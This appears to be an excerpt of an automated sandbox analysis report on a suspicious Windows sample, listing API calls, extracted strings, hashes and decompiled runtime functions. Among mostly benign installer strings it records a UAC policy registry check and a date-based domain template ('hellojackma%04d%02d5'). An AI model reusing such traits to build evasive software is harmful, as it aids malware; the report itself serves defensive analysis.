                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                    • Part of subcall function 1000CA40: HeapFree.KERNEL32(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                    • Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID: .com/$hellojackma%04d%02d5
                                                                                                                                                                  • API String ID: 2531412260-1062581820
                                                                                                                                                                  • Opcode ID: b3b5e4a9ef3af28ddef4d7ff14b36f0ad95708faccf5eecfd25703a8a2e53819
                                                                                                                                                                  • Instruction ID: cd4cb29569ec0e2556b74841a2cacae5ea17faf8370a901a59aadef40f2aa25d
                                                                                                                                                                  • Opcode Fuzzy Hash: b3b5e4a9ef3af28ddef4d7ff14b36f0ad95708faccf5eecfd25703a8a2e53819
                                                                                                                                                                  • Instruction Fuzzy Hash: F4211575C011299BEB28DB64CC55BEEB7B4EF48380F5081E9E51D63251EB306B84CF51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,000000F8,000000FF,IGNOREDEPENDENCIES,00000000,000000F8,?,0041E3D9,00000000,IGNOREDEPENDENCIES,00000000,000003BC,?), ref: 00408F13
                                                                                                                                                                  Strings
                                                                                                                                                                  • IGNOREDEPENDENCIES, xrefs: 00408ED0
                                                                                                                                                                  • Failed to copy the property value., xrefs: 00408F47
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
                                                                                                                                                                  • API String ID: 1825529933-1412343224
                                                                                                                                                                  • Opcode ID: b794d1c59101629c5583858caeb8a44d263cae718f4ace955032913a256d29ce
                                                                                                                                                                  • Instruction ID: f96c68ac59f347317699d337fe0a07073afac5c922c554633ce395f9cc01c7c8
                                                                                                                                                                  • Opcode Fuzzy Hash: b794d1c59101629c5583858caeb8a44d263cae718f4ace955032913a256d29ce
                                                                                                                                                                  • Instruction Fuzzy Hash: 0211E732604212AFDB109E54DD84F9A73A2BB04360F21413BFB58BB2D1CB38A840C79C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to check the dictionary of unique dependencies., xrefs: 0041E966
                                                                                                                                                                  • Failed to add "%ls" to the string dictionary., xrefs: 0041E99C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcstok_s
                                                                                                                                                                  • String ID: Failed to add "%ls" to the string dictionary.$Failed to check the dictionary of unique dependencies.
                                                                                                                                                                  • API String ID: 86363921-3357719049
                                                                                                                                                                  • Opcode ID: 1889f9bbdea3096e0420c011ebc27a1313e5d69039e1efe62e58e650f48ba375
                                                                                                                                                                  • Instruction ID: 47e5814851f934421269b8b82c3deee705c5f10cf98d93002a8e670473a92e75
                                                                                                                                                                  • Opcode Fuzzy Hash: 1889f9bbdea3096e0420c011ebc27a1313e5d69039e1efe62e58e650f48ba375
                                                                                                                                                                  • Instruction Fuzzy Hash: EA017BB6910228BBC36161479C01EDF6A6CDF95B75F10012BFC08A6100E61D9E4186ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • Sleep.KERNEL32(20000004,00000000,00000000,00000000,00000000,00000000,?,?,00412674,?,00000001,20000004,00000000,00000000,?,00000000), ref: 004380E3
                                                                                                                                                                  • SetNamedSecurityInfoW.ADVAPI32(00000000,?,000007D0,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00412674,?), ref: 004380FE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoNamedSecuritySleep
                                                                                                                                                                  • String ID: aclutil.cpp
                                                                                                                                                                  • API String ID: 2352087905-2159165307
                                                                                                                                                                  • Opcode ID: ec7756fb6a7cfadaf5478f130e5dc0d97147c34b31cafa95f6074806945ac206
                                                                                                                                                                  • Instruction ID: b845fa26ced751fd315098cf6dc2a2135faa2681181a3235f73b01f59f6026fd
                                                                                                                                                                  • Opcode Fuzzy Hash: ec7756fb6a7cfadaf5478f130e5dc0d97147c34b31cafa95f6074806945ac206
                                                                                                                                                                  • Instruction Fuzzy Hash: A5015E33901229BBCF125E95CD05A8FBA75EF89754F02111AFE0466120DB398D22A7D4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • LCMapStringW.KERNEL32(0000007F,00000000,00000000,000000F8,00000000,000000F8,00000000,00000000,000000F8,00000000,00000000,00000000,?,00434154,00000000,00000000), ref: 0043331C
                                                                                                                                                                  • GetLastError.KERNEL32(?,00434154,00000000,00000000,000000F8,00000200,?,00437D2D,00000000,000000F8,00000000,000000F8,00000000,00000000,00000000), ref: 00433326
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastString
                                                                                                                                                                  • String ID: strutil.cpp
                                                                                                                                                                  • API String ID: 3728238275-3612885251
                                                                                                                                                                  • Opcode ID: fa4a53a6279ed186365556dd42a99a1f2e90ecbf70af5d16c93ea6df15b1371d
                                                                                                                                                                  • Instruction ID: d130062488f1d919d7b15b45c07dfeedbaad822b6e62964ea8f72955ec642c36
                                                                                                                                                                  • Opcode Fuzzy Hash: fa4a53a6279ed186365556dd42a99a1f2e90ecbf70af5d16c93ea6df15b1371d
                                                                                                                                                                  • Instruction Fuzzy Hash: 0A0128339002257BDB219EA79C04F5BBBA8EF49761F010226FE14EB251CB35CC108BE4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 0040FCD0
                                                                                                                                                                  • CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 0040FD2A
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to initialize COM on cache thread., xrefs: 0040FCDC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                                                  • String ID: Failed to initialize COM on cache thread.
                                                                                                                                                                  • API String ID: 3442037557-3629645316
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0043608B
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004360BE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                  • API String ID: 344208780-1270936966
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00436004
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00436037
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                  • API String ID: 344208780-1270936966
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,00436125,?), ref: 004362F1
                                                                                                                                                                  Strings
                                                                                                                                                                  • EnableLUA, xrefs: 004362BF
                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 0043629E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
                                                                                                                                                                  • API String ID: 3535843008-3551287084
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __calloc_crt
                                                                                                                                                                  • String ID: nE
                                                                                                                                                                  • API String ID: 3494438863-985951428
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 00402E66
                                                                                                                                                                    • Part of subcall function 00432058: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00402807,00000000), ref: 0043206C
                                                                                                                                                                    • Part of subcall function 00432058: GetProcAddress.KERNEL32(00000000), ref: 00432073
                                                                                                                                                                    • Part of subcall function 00432058: GetLastError.KERNEL32(?,?,?,00402807,00000000), ref: 0043208A
                                                                                                                                                                    • Part of subcall function 0040266A: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 004026F1
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set variant value., xrefs: 00402EA3
                                                                                                                                                                  • Failed to get 64-bit folder., xrefs: 00402E89
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                                  • String ID: Failed to get 64-bit folder.$Failed to set variant value.
                                                                                                                                                                  • API String ID: 3109562764-2681622189
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,00000000,0041218D,00000000,?,00000000,?,?,?,00436668,?,?,?), ref: 004373C7
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00436668,?,?,?), ref: 004373D1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                  • API String ID: 442123175-2967768451
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000,?,?,00422483,000000F9,00000000), ref: 0040B4BF
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to open registration key., xrefs: 0040B48F
                                                                                                                                                                  • Failed to update resume mode., xrefs: 0040B4A9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to open registration key.$Failed to update resume mode.
                                                                                                                                                                  • API String ID: 3535843008-3366686031
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,?,?,?,00000000,?,?,?,00412161,00000000,00000000,00000000,00000000,00000000), ref: 00436FC7
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00412161,00000000,00000000,00000000,00000000,00000000,?,00401414,00000000,?), ref: 00436FD1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                  • API String ID: 2976181284-2967768451
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,00000000,00000000,7519FB40,?,?,?,00407847,00401C5F,?,?,00000000,00000000), ref: 004370BD
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00407847,00401C5F,?,?,00000000,00000000,?,?,?,00401C5F,77A19EB0,00000000), ref: 004370C7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastSize
                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                  • API String ID: 464720113-2967768451
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • HttpQueryInfoW.WININET(00000000,20000005,00000000,75C08550,00000000), ref: 004386B8
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00425461,00000000,?,00000000,00000000,00000078,?,75C08550,HEAD,00000000,00000000,00000000,?), ref: 004386C2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorHttpInfoLastQuery
                                                                                                                                                                  • String ID: inetutil.cpp
                                                                                                                                                                  • API String ID: 4218848986-2900720265
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • HttpQueryInfoW.WININET(?,?,00000000,?,?), ref: 00438725
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0043872F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorHttpInfoLastQuery
                                                                                                                                                                  • String ID: inetutil.cpp
                                                                                                                                                                  • API String ID: 4218848986-2900720265
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00435A6D
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00435A9D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                  • API String ID: 344208780-1270936966
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,?,?,00000000,?,?,?), ref: 00436471
                                                                                                                                                                  • CoCreateInstance.OLE32(00000001,00000000,00000001,004537A8,00000000), ref: 00436489
                                                                                                                                                                  Strings
                                                                                                                                                                  • Microsoft.Update.AutoUpdate, xrefs: 0043646C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFromInstanceProg
                                                                                                                                                                  • String ID: Microsoft.Update.AutoUpdate
                                                                                                                                                                  • API String ID: 2151042543-675569418
                                                                                                                                                                  • Opcode ID: 84d588e92bc565ca5c3b16b09a6946c3cec984a7fde3f217bac370fceb8be6c5
                                                                                                                                                                  • Instruction ID: ab892e728e3fe550d83bb20e20be6664cdb86b9258d64896b204cc20e733082d
                                                                                                                                                                  • Opcode Fuzzy Hash: 84d588e92bc565ca5c3b16b09a6946c3cec984a7fde3f217bac370fceb8be6c5
                                                                                                                                                                  • Instruction Fuzzy Hash: 93F0B431A00208BFDB00DFA8DC05AEFB7B8AB08741F404036EA01E3151DA74AA0886AA
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00435D14
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00435D44
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                  • API String ID: 344208780-1270936966
                                                                                                                                                                  • Opcode ID: e0c88e5c0cb610fd30cf4c45c4bbcc91821b5fdd54072593c776f8a7e42a3e9c
                                                                                                                                                                  • Instruction ID: d60045897c169dae4cfd37fd0678cf8ce8402dc30d135672655e28143b771af1
                                                                                                                                                                  • Opcode Fuzzy Hash: e0c88e5c0cb610fd30cf4c45c4bbcc91821b5fdd54072593c776f8a7e42a3e9c
                                                                                                                                                                  • Instruction Fuzzy Hash: C0F0B431140A69ABCB214E55DC0CF5B7BA8EF49761F24912AFD059F320CB78C910CAE9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                  			E10002760(void* __eflags) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				char _v56;
                                                                                                                                                                  				char _v84;
                                                                                                                                                                  				void* _t14;
                                                                                                                                                                  				intOrPtr _t20;
                                                                                                                                                                  
                                                                                                                                                                  				_push(0xffffffff);
                                                                                                                                                                  				_push(E10023468);
                                                                                                                                                                  				_push( *[fs:0x0]);
                                                                                                                                                                  				 *[fs:0x0] = _t20;
                                                                                                                                                                  				E10001160( &_v84, __eflags, "vector<T> too long");
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				E10001ED0( &_v56,  &_v84);
                                                                                                                                                                  				E1000EC4B( &_v56, 0x10331ab8);
                                                                                                                                                                  				_v8 = 0xffffffff;
                                                                                                                                                                  				_t14 = E100011A0( &_v84);
                                                                                                                                                                  				 *[fs:0x0] = _v16;
                                                                                                                                                                  				return _t14;
                                                                                                                                                                  			}










                                                                                                                                                                  APIs
                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 10002796
                                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 100027A4
                                                                                                                                                                    • Part of subcall function 1000EC4B: RaiseException.KERNEL32(?,?,1000CCA2,100019D3,?,?,?,?,1000CCA2,100019D3,10331A60,103352E0), ref: 1000EC8B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exception
                                                                                                                                                                  • String ID: vector<T> too long
                                                                                                                                                                  • API String ID: 1843230569-3788999226
                                                                                                                                                                  • Opcode ID: aa5bac77e3ca4c0340f06c982ba03c51740e46cee900e1e979d60fc800d53ef8
                                                                                                                                                                  • Instruction ID: cf548f9f7ce9eaabb72c084c4c26244c4012029c0b18c491b87eb38bcea2b3c1
                                                                                                                                                                  • Opcode Fuzzy Hash: aa5bac77e3ca4c0340f06c982ba03c51740e46cee900e1e979d60fc800d53ef8
                                                                                                                                                                  • Instruction Fuzzy Hash: 53F034B5811588ABDB18EBD4DD82BDEB738EB05BA0F504368F5126A6C4DB346A04CB90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                                  			E1000443C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                  				intOrPtr* _t20;
                                                                                                                                                                  				intOrPtr* _t23;
                                                                                                                                                                  				void* _t25;
                                                                                                                                                                  				void* _t26;
                                                                                                                                                                  				void* _t27;
                                                                                                                                                                  
                                                                                                                                                                  				_t27 = __eflags;
                                                                                                                                                                  				_push(0x44);
                                                                                                                                                                  				E1000F06B(E10022FB8, __ebx, __edi, __esi);
                                                                                                                                                                  				E10001160(_t25 - 0x28, _t27, "invalid string position");
                                                                                                                                                                  				_t2 = _t25 - 4;
                                                                                                                                                                  				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                                                                                  				_t20 = _t25 - 0x50;
                                                                                                                                                                  				E10001DF0(_t20,  *_t2, _t25 - 0x28);
                                                                                                                                                                  				 *((intOrPtr*)(_t25 - 0x50)) = 0x100242c8;
                                                                                                                                                                  				E1000EC4B(_t25 - 0x50, 0x10331468);
                                                                                                                                                                  				asm("int3");
                                                                                                                                                                  				_push(__esi);
                                                                                                                                                                  				_t23 = _t20;
                                                                                                                                                                  				E10001F50(_t20,  *((intOrPtr*)(_t26 + 8)));
                                                                                                                                                                  				 *_t23 = 0x100242c8;
                                                                                                                                                                  				return _t23;
                                                                                                                                                                  			}









                                                                                                                                                                  APIs
                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 10004443
                                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 10004475
                                                                                                                                                                    • Part of subcall function 1000EC4B: RaiseException.KERNEL32(?,?,1000CCA2,100019D3,?,?,?,?,1000CCA2,100019D3,10331A60,103352E0), ref: 1000EC8B
                                                                                                                                                                    • Part of subcall function 10001F50: std::exception::exception.LIBCMT ref: 10001F73
                                                                                                                                                                  Strings
                                                                                                                                                                  • invalid string position, xrefs: 10004448
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
